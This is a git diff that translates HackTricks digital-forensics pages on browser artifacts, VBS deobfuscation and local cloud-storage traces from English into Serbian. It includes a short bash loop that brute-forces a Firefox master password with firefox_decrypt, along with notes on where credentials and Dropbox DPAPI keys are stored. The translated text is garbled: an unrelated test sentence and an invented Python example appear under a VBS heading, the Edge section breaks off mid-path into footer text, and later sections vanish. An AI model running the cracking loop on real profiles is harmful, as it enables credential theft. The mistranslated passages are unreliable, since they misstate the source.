- - Use specific SQL queries to extract history and downloads information.
-- **bookmarkbackups**: Contains backups of bookmarks.
-- **formhistory.sqlite**: Stores web form data.
-- **handlers.json**: Manages protocol handlers.
-- **persdict.dat**: Custom dictionary words.
-- **addons.json** and **extensions.sqlite**: Information on installed add-ons and extensions.
-- **cookies.sqlite**: Cookie storage, with [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) available for inspection on Windows.
-- **cache2/entries** or **startupCache**: Cache data, accessible through tools like [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html).
-- **favicons.sqlite**: Stores favicons.
-- **prefs.js**: User settings and preferences.
-- **downloads.sqlite**: Older downloads database, now integrated into places.sqlite.
-- **thumbnails**: Website thumbnails.
-- **logins.json**: Encrypted login information.
-- **key4.db** or **key3.db**: Stores encryption keys for securing sensitive information.
+- **places.sqlite**: Čuva istoriju, obeleživače i preuzimanja. Alati poput [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) na Windows-u mogu pristupiti podacima istorije.
+- Koristite specifične SQL upite za izvlačenje informacija o istoriji i preuzimanjima.
+- **bookmarkbackups**: Sadrži rezervne kopije obeleživača.
+- **formhistory.sqlite**: Čuva podatke o veb obrascima.
+- **handlers.json**: Upravljači protokola.
+- **persdict.dat**: Reči prilagođenog rečnika.
+- **addons.json** i **extensions.sqlite**: Informacije o instaliranim dodacima i proširenjima.
+- **cookies.sqlite**: Skladište kolačića, sa [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) dostupnim za pregled na Windows-u.
+- **cache2/entries** ili **startupCache**: Keš podaci, dostupni putem alata poput [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html).
+- **favicons.sqlite**: Čuva favikone.
+- **prefs.js**: Korisnička podešavanja i preferencije.
+- **downloads.sqlite**: Starija baza podataka preuzimanja, sada integrisana u places.sqlite.
+- **thumbnails**: Sličice veb sajtova.
+- **logins.json**: Šifrovani podaci za prijavljivanje.
+- **key4.db** ili **key3.db**: Čuva ključeve za šifrovanje osetljivih informacija.
-Additionally, checking the browser’s anti-phishing settings can be done by searching for `browser.safebrowsing` entries in `prefs.js`, indicating whether safe browsing features are enabled or disabled.
+Dodatno, proveru postavki protiv-fisinga pregledača možete izvršiti pretragom unosa `browser.safebrowsing` u `prefs.js`, što ukazuje da li su funkcije sigurnog pregledanja omogućene ili onemogućene.
-To try to decrypt the master password, you can use [https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox\_decrypt)\
-With the following script and call you can specify a password file to brute force:
+Da biste pokušali dešifrovanje glavne lozinke, možete koristiti [https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox\_decrypt)\
+Pomoću sledećeg skripta i poziva možete specificirati fajl sa lozinkom za brute force:
{% code title="brute.sh" %}
```bash
@@ -83,8 +83,8 @@ With the following script and call you can specify a password file to brute forc
#./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:"
passfile=$1
while read pass; do
- echo "Trying $pass"
- echo "$pass" | python firefox_decrypt.py
+echo "Trying $pass"
+echo "$pass" | python firefox_decrypt.py
done < $passfile
```
{% endcode %}
@@ -93,113 +93,66 @@ done < $passfile
## Google Chrome
-Google Chrome stores user profiles in specific locations based on the operating system:
+Google Chrome čuva korisničke profile na određenim lokacijama zavisno od operativnog sistema:
- **Linux**: `~/.config/google-chrome/`
- **Windows**: `C:\Users\XXX\AppData\Local\Google\Chrome\User Data\`
- **MacOS**: `/Users/$USER/Library/Application Support/Google/Chrome/`
-Within these directories, most user data can be found in the **Default/** or **ChromeDefaultData/** folders. The following files hold significant data:
+U ovim direktorijumima, većina korisničkih podataka se može naći u fasciklama **Default/** ili **ChromeDefaultData/**. Sledeći fajlovi sadrže značajne podatke:
-- **History**: Contains URLs, downloads, and search keywords. On Windows, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) can be used to read the history. The "Transition Type" column has various meanings, including user clicks on links, typed URLs, form submissions, and page reloads.
-- **Cookies**: Stores cookies. For inspection, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) is available.
-- **Cache**: Holds cached data. To inspect, Windows users can utilize [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html).
-- **Bookmarks**: User bookmarks.
-- **Web Data**: Contains form history.
-- **Favicons**: Stores website favicons.
-- **Login Data**: Includes login credentials like usernames and passwords.
-- **Current Session**/**Current Tabs**: Data about the current browsing session and open tabs.
-- **Last Session**/**Last Tabs**: Information about the sites active during the last session before Chrome was closed.
-- **Extensions**: Directories for browser extensions and addons.
-- **Thumbnails**: Stores website thumbnails.
-- **Preferences**: A file rich in information, including settings for plugins, extensions, pop-ups, notifications, and more.
-- **Browser’s built-in anti-phishing**: To check if anti-phishing and malware protection are enabled, run `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Look for `{"enabled: true,"}` in the output.
+- **History**: Sadrži URL-ove, preuzimanja i ključne reči pretrage. Na Windows-u, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) se može koristiti za čitanje istorije. Kolona "Transition Type" ima različita značenja, uključujući korisničke klikove na linkove, unete URL-ove, podnesene forme i osvežavanje stranica.
+- **Cookies**: Čuva kolačiće. Za pregled, dostupan je [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html).
+- **Cache**: Čuva keširane podatke. Windows korisnici mogu koristiti [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html) za pregled.
+- **Bookmarks**: Korisnički obeleživači.
+- **Web Data**: Sadrži istoriju formi.
+- **Favicons**: Čuva favicon-e veb sajtova.
+- **Login Data**: Uključuje korisničke podatke za prijavljivanje kao što su korisnička imena i lozinke.
+- **Current Session**/**Current Tabs**: Podaci o trenutnoj sesiji pretraživanja i otvorenim karticama.
+- **Last Session**/**Last Tabs**: Informacije o sajtovima aktivnim tokom poslednje sesije pre nego što je Chrome zatvoren.
+- **Extensions**: Direktorijumi za proširenja i dodatke pregledača.
+- **Thumbnails**: Čuva sličice veb sajtova.
+- **Preferences**: Fajl bogat informacijama, uključujući podešavanja za dodatke, proširenja, iskačuće prozore, obaveštenja i još mnogo toga.
+- **Ugrađena anti-phishing zaštita pregledača**: Da biste proverili da li je anti-phishing i zaštita od malvera omogućena, pokrenite `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Potražite `{"enabled: true,"}` u izlazu.
-## **SQLite DB Data Recovery**
+## **Obnova podataka iz SQLite baze**
-As you can observe in the previous sections, both Chrome and Firefox use **SQLite** databases to store the data. It's possible to **recover deleted entries using the tool** [**sqlparse**](https://github.com/padfoot999/sqlparse) **or** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
+Kao što možete primetiti u prethodnim odeljcima, i Chrome i Firefox koriste **SQLite** baze podataka za čuvanje podataka. Moguće je **obnoviti obrisane unose koristeći alat** [**sqlparse**](https://github.com/padfoot999/sqlparse) **ili** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
## **Internet Explorer 11**
-Internet Explorer 11 manages its data and metadata across various locations, aiding in separating stored information and its corresponding details for easy access and management.
+Internet Explorer 11 upravlja svojim podacima i metapodacima na različitim lokacijama, olakšavajući razdvajanje čuvanih informacija i odgovarajućih detalja radi lakšeg pristupa i upravljanja.
-### Metadata Storage
-Metadata for Internet Explorer is stored in `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (with VX being V01, V16, or V24). Accompanying this, the `V01.log` file might show modification time discrepancies with `WebcacheVX.data`, indicating a need for repair using `esentutl /r V01 /d`. This metadata, housed in an ESE database, can be recovered and inspected using tools like photorec and [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), respectively. Within the **Containers** table, one can discern the specific tables or containers where each data segment is stored, including cache details for other Microsoft tools such as Skype.
+### Čuvanje metapodataka
+Metapodaci za Internet Explorer se čuvaju u `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (pri čemu je VX V01, V16 ili V24). Uz to, fajl `V01.log` može pokazivati neslaganja u vremenu izmene sa `WebcacheVX.data`, što ukazuje na potrebu za popravkom korišćenjem `esentutl /r V01 /d`. Ovi metapodaci, smešteni u ESE bazi podataka, mogu se obnoviti i pregledati pomoću alata kao što su photorec i [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html). U okviru tabele **Containers**, moguće je razlikovati specifične tabele ili kontejnere u kojima se čuva svaki segment podataka, uključujući detalje keša za druge Microsoft alate kao što je Skype.
-### Cache Inspection
-The [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) tool allows for cache inspection, requiring the cache data extraction folder location. Metadata for cache includes filename, directory, access count, URL origin, and timestamps indicating cache creation, access, modification, and expiry times.
+### Pregled keša
+Alat [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) omogućava pregled keša, uz zahtev za lokacijom fascikle za ekstrakciju podataka iz keša. Metapodaci za keš uključuju ime fajla, direktorijum, broj pristupa, URL poreklo i vremenske oznake koje ukazuju na vreme kreiranja, pristupa, izmene i isteka keša.
-### Cookies Management
-Cookies can be explored using [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), with metadata encompassing names, URLs, access counts, and various time-related details. Persistent cookies are stored in `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, with session cookies residing in memory.
+### Upravljanje kolačićima
+Kolačiće je moguće istražiti pomoću [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), pri čemu metapodaci obuhvataju imena, URL-ove, broj pristupa i razne detalje vezane za vreme. Trajni kolačići se čuvaju u `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, dok se sesijski kolačići čuvaju u memoriji.
-### Download Details
-Downloads metadata is accessible via [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), with specific containers holding data like URL, file type, and download location. Physical files can be found under `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`.
+### Detalji preuzimanja
+Metapodaci o preuzimanjima su dostupni putem [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), pri čemu specifični kontejneri sadrže podatke poput URL-a, tipa fajla i lokacije preuzimanja. Fizički fajlovi se mogu pronaći pod `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`.
-### Browsing History
-To review browsing history, [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) can be used, requiring the location of extracted history files and configuration for Internet Explorer. Metadata here includes modification and access times, along with access counts. History files are located in `%userprofile%\Appdata\Local\Microsoft\Windows\History`.
+### Istorija pretraživanja
+Za pregled istorije pretraživanja može se koristiti [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html), uz zahtev za lokacijom izdvojenih fajlova istorije i konfiguracijom za Internet Explorer. Metapodaci ovde uključuju vreme izmene i pristupa, zajedno sa brojem pristupa. Fajlovi istorije se nalaze u `%userprofile%\Appdata\Local\Microsoft\Windows\History`.
-### Typed URLs
-Typed URLs and their usage timings are stored within the registry under `NTUSER.DAT` at `Software\Microsoft\InternetExplorer\TypedURLs` and `Software\Microsoft\InternetExplorer\TypedURLsTime`, tracking the last 50 URLs entered by the user and their last input times.
+### Uneti URL-ovi
+Uneti URL-ovi i vremena njihove upotrebe se čuvaju u registru pod `NTUSER.DAT` na lokaciji `Software\Microsoft\InternetExplorer\TypedURLs` i `Software\Microsoft\InternetExplorer\TypedURLsTime`, prateći poslednjih 50 URL-ova unetih od strane korisnika i njihova poslednja vremena unosa.
## Microsoft Edge
-Microsoft Edge stores user data in `%userprofile%\Appdata\Local\Packages`. The paths for various data types are:
+Microsoft Edge čuva korisničke podatke u `%userprofile%\Appdata\Local\Packages`. Putanje za različite vrste podataka su:
-- **Profile Path**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC`
-- **History, Cookies, and Downloads**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat`
-- **Settings, Bookmarks, and Reading List**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb`
-- **Cache**: `C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC#!XXX\MicrosoftEdge\Cache`
-- **Last Active Sessions**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active`
-
-## Safari
-
-Safari data is stored at `/Users/$User/Library/Safari`. Key files include:
-
-- **History.db**: Contains `history_visits` and `history_items` tables with URLs and visit timestamps. Use `sqlite3` to query.
-- **Downloads.plist**: Information about downloaded files.
-- **Bookmarks.plist**: Stores bookmarked URLs.
-- **TopSites.plist**: Most frequently visited sites.
-- **Extensions.plist**: List of Safari browser extensions. Use `plutil` or `pluginkit` to retrieve.
-- **UserNotificationPermissions.plist**: Domains permitted to push notifications. Use `plutil` to parse.
-- **LastSession.plist**: Tabs from the last session. Use `plutil` to parse.
-- **Browser’s built-in anti-phishing**: Check using `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. A response of 1 indicates the feature is active.
-
-## Opera
-
-Opera's data resides in `/Users/$USER/Library/Application Support/com.operasoftware.Opera` and shares Chrome's format for history and downloads.
-
-- **Browser’s built-in anti-phishing**: Verify by checking if `fraud_protection_enabled` in the Preferences file is set to `true` using `grep`.
-
-These paths and commands are crucial for accessing and understanding the browsing data stored by different web browsers.
-
-
-## References
-* [https://nasbench.medium.com/web-browsers-forensics-7e99940c579a](https://nasbench.medium.com/web-browsers-forensics-7e99940c579a)
-* [https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/](https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/)
-* [https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file)
-* **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123**
-
-
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
-
-
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+- **Putanja profila**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC`
+- **Istorija, kolačići i preuzimanja**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat`
+- **Podešavanja, obeleživači i lista za čitanje**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan
+* Nabavite [**zvanični PEASS & HackTricks suvenir**](https://peass.creator-spring.com)
+* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
index e1fb4471c..f8940045e 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
@@ -1,81 +1,80 @@
-
-
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
-Some things that could be useful to debug/deobfuscate a malicious VBS file:
+Neki korisni saveti za debagovanje/deobfuskaciju zlonamernog VBS fajla:
## echo
-
```bash
Wscript.Echo "Like this?"
```
-
-## Commnets
-
+## Komentari
```bash
' this is a comment
```
-
## Test
+Ovo je testni dokument za proveru prevoda.
```bash
cscript.exe file.vbs
```
+## Upisivanje podataka u datoteku
-## Write data to a file
+Da biste upisali podatke u datoteku, možete koristiti funkciju `Write` u Pythonu. Evo osnovnog primjera:
+```python
+with open('datoteka.txt', 'w') as f:
+ f.write('Ovo je primjer teksta koji će biti upisan u datoteku.')
+```
+
+U ovom primjeru, `datoteka.txt` je naziv datoteke u koju želite upisati podatke. Koristimo `with` izjavu kako bismo se pobrinuli da se datoteka pravilno zatvori nakon upisa. Funkcija `write` se koristi za upisivanje teksta u datoteku.
+
+Nakon izvršavanja ovog koda, datoteka `datoteka.txt` će biti stvorena (ako već ne postoji) i sadržavat će tekst "Ovo je primjer teksta koji će biti upisan u datoteku."
```js
Function writeBinary(strBinary, strPath)
- Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
+Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
- ' below lines purpose: checks that write access is possible!
- Dim oTxtStream
+' below lines purpose: checks that write access is possible!
+Dim oTxtStream
- On Error Resume Next
- Set oTxtStream = oFSO.createTextFile(strPath)
+On Error Resume Next
+Set oTxtStream = oFSO.createTextFile(strPath)
- If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
- On Error GoTo 0
+If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
+On Error GoTo 0
- Set oTxtStream = Nothing
- ' end check of write access
+Set oTxtStream = Nothing
+' end check of write access
- With oFSO.createTextFile(strPath)
- .Write(strBinary)
- .Close
- End With
+With oFSO.createTextFile(strPath)
+.Write(strBinary)
+.Close
+End With
End Function
```
-
-
-
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE PRETPLATE**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
-
-
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
index 4359365c5..de1802b50 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
@@ -1,138 +1,136 @@
-# Local Cloud Storage
+# Lokalno skladištenje u oblaku
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Koristite [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) da biste lako izgradili i **automatizovali radne tokove** uz pomoć najnaprednijih alata zajednice na svetu.\
+Danas dobijte pristup:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## OneDrive
-In Windows, you can find the OneDrive folder in `\Users\\AppData\Local\Microsoft\OneDrive`. And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log` which contains some interesting data regarding the synchronized files:
+Na Windows-u, OneDrive folder se može pronaći u `\Users\\AppData\Local\Microsoft\OneDrive`. A unutar `logs\Personal` foldera moguće je pronaći datoteku `SyncDiagnostics.log` koja sadrži neke zanimljive podatke u vezi sa sinhronizovanim datotekama:
-* Size in bytes
-* Creation date
-* Modification date
-* Number of files in the cloud
-* Number of files in the folder
-* **CID**: Unique ID of the OneDrive user
-* Report generation time
-* Size of the HD of the OS
+* Veličina u bajtovima
+* Datum kreiranja
+* Datum modifikacije
+* Broj datoteka u oblaku
+* Broj datoteka u folderu
+* **CID**: Jedinstveni ID OneDrive korisnika
+* Vreme generisanja izveštaja
+* Veličina HD-a operativnog sistema
-Once you have found the CID it's recommended to **search files containing this ID**. You may be able to find files with the name: _**\.ini**_ and _**\.dat**_ that may contain interesting information like the names of files synchronized with OneDrive.
+Kada pronađete CID, preporučuje se **pretraga datoteka koje sadrže ovaj ID**. Moguće je pronaći datoteke sa imenom: _**\.ini**_ i _**\.dat**_ koje mogu sadržati zanimljive informacije poput imena datoteka sinhronizovanih sa OneDrive-om.
## Google Drive
-In Windows, you can find the main Google Drive folder in `\Users\\AppData\Local\Google\Drive\user_default`\
-This folder contains a file called Sync\_log.log with information like the email address of the account, filenames, timestamps, MD5 hashes of the files, etc. Even deleted files appear in that log file with its corresponding MD5.
+Na Windows-u, glavni Google Drive folder se može pronaći u `\Users\\AppData\Local\Google\Drive\user_default`\
+Ovaj folder sadrži datoteku nazvanu Sync\_log.log sa informacijama poput adrese e-pošte naloga, imena datoteka, vremenskih oznaka, MD5 heševa datoteka, itd. Čak i obrisane datoteke se pojavljuju u toj log datoteci sa odgovarajućim MD5 vrednostima.
-The file **`Cloud_graph\Cloud_graph.db`** is a sqlite database which contains the table **`cloud_graph_entry`**. In this table you can find the **name** of the **synchronized** **files**, modified time, size, and the MD5 checksum of the files.
+Datoteka **`Cloud_graph\Cloud_graph.db`** je sqlite baza podataka koja sadrži tabelu **`cloud_graph_entry`**. U ovoj tabeli možete pronaći **ime** **sinhronizovanih** **datoteka**, vreme izmene, veličinu i MD5 kontrolnu sumu datoteka.
-The table data of the database **`Sync_config.db`** contains the email address of the account, the path of the shared folders and the Google Drive version.
+Podaci tabele baze podataka **`Sync_config.db`** sadrže adresu e-pošte naloga, putanje deljenih foldera i verziju Google Drive-a.
## Dropbox
-Dropbox uses **SQLite databases** to manage the files. In this\
-You can find the databases in the folders:
+Dropbox koristi **SQLite baze podataka** za upravljanje datotekama. U ovim\
+Baze podataka se mogu pronaći u folderima:
-* `\Users\\AppData\Local\Dropbox`
-* `\Users\\AppData\Local\Dropbox\Instance1`
-* `\Users\\AppData\Roaming\Dropbox`
+* `\Users\\AppData\Local\Dropbox`
+* `\Users\\AppData\Local\Dropbox\Instance1`
+* `\Users\\AppData\Roaming\Dropbox`
-And the main databases are:
+A glavne baze podataka su:
* Sigstore.dbx
* Filecache.dbx
* Deleted.dbx
* Config.dbx
-The ".dbx" extension means that the **databases** are **encrypted**. Dropbox uses **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/ms995355\(v=msdn.10\)?redirectedfrom=MSDN))
+Ekstenzija ".dbx" znači da su **baze podataka** **šifrovane**. Dropbox koristi **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/ms995355\(v=msdn.10\)?redirectedfrom=MSDN))
-To understand better the encryption that Dropbox uses you can read [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html).
+Da biste bolje razumeli šifrovanje koje Dropbox koristi, možete pročitati [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html).
-However, the main information is:
+Međutim, glavne informacije su:
-* **Entropy**: d114a55212655f74bd772e37e64aee9b
-* **Salt**: 0D638C092E8B82FC452883F95F355B8E
